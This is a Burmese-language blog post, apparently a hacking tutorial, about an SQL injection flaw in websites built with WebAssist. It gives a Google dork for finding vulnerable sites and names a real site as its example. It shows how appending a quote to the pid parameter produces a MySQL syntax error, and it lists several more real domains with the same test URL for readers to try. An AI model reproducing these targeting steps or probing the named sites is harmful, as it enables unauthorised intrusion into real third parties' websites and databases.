WebAssit မွေရးဆြဲေပးတဲ့ website ေတြမွာဆုိရင္ SQL Injection Vulnerability ရွိတယ္ဆုိတာကို 1337 မွ ပာက္ကာ တစ္ခ်ဳိ ့မွ ေတြ ့ခဲ့တာပါ.. နည္းေလးကေတာ့ လြယ္ပါတယ္..
Dork: intext:"Powered By webAssist" inurl:index.php?pid=
Dork ေလးကို အသုံးျပဳ ့ျပီး Vulnerability ရွိတဲ့ဆုိဒ္ေတြကိုရွာေဖြရမွာျဖစ္ပါတယ္..
လင့္ေတြအမ်ားၾကီးက်လာပါမယ္.. မိမိၾကိုက္ရာလင့္တစ္ခုကို နုိပ္လုိက္ပါ.. ကြ်န္ေတာ္ကေတာ့..
http://www.aaenvironmental.ca/index.php?pid=8
ကုိယူလုိက္ပါမယ္.. အေပါက္ရွာပုံေလးကေတာ့ ဘာမွမခက္ပါဘူး 8 အေနာက္မွာ injection basic code ျဖစ္တဲ့ ' ေလးကို ထပ္ထည့္ေပးလိုက္ရင္ရပါျပီ..
http://www.aaenvironmental.ca/index.php?pid=8'
သြားၾကည့္လိုက္ပါ..
Database error: Invalid SQL: SELECT * FROM cms_master WHERE page_id IN ('8'')
MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''8'')' at line 1)
Session halted.
ဆုိျပီး error ကိုေတြ ့ရမွာျဖစ္ပါတယ္..
ေလ့လာနုိင္ရင္တစ္ျခားလင့္မ်ား..
http://www.aaenvironmental.ca/index.php?pid=8%27
http://www.londonvetsurgeon.ca/index.php?pid=8%27
http://www.knollcrestlodge.com/index.php?pid=8%27
Sql injection ပိုင္းမသိေသးတဲ့သူကေတာ့ ေအာက္ကလင့္မွာသြားဖတ္ေပးပါ..
http://www.minsoeyarsar.com/2012/09/cyberoot-sql-injection-basic-tutorial.html
No comments:
Post a Comment